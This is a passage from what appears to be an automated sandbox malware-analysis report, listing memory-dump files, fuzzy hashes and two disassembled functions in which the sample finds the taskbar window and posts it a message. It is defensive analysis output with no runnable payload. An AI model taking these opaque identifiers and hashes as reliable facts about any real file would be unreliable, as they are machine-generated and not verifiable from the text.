                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 529655941-2988720461
                                                                                        • Opcode ID: 156918923c2f8a1cb9ce0301b0096903a9b85bfa5bdaee7a077da1be3e8da473
                                                                                        • Instruction ID: 85bf0061b56a42ce8e4bfbb9b7b0fdfb97b21de41888cda1796bb951f69d2dd9
                                                                                        • Opcode Fuzzy Hash: 156918923c2f8a1cb9ce0301b0096903a9b85bfa5bdaee7a077da1be3e8da473
                                                                                        • Instruction Fuzzy Hash: 50D0A932B803287BF2246330AC0BFC63A189B08B20F000808F206AA0E0C8E4E9009A15
                                                                                        Function 00F48698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F486A2
                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F486B5
                                                                                          • Part of subcall function 00F27A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00F27AD0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 529655941-2988720461
                                                                                        • Opcode ID: ab96aec1b8e8042630e29e3e5a4f257b10badb04dd2e360bffd13c096b13c231
                                                                                        • Instruction ID: c135b68450755a4e4b44c25a1fa5d4d56103f86a2831e097d78757434c62aba6
                                                                                        • Opcode Fuzzy Hash: ab96aec1b8e8042630e29e3e5a4f257b10badb04dd2e360bffd13c096b13c231
                                                                                        • Instruction Fuzzy Hash: 06D02232B84328B7F2347330EC0BFC63A189B04B20F000808F30AAA0E0C8E4ED00DB10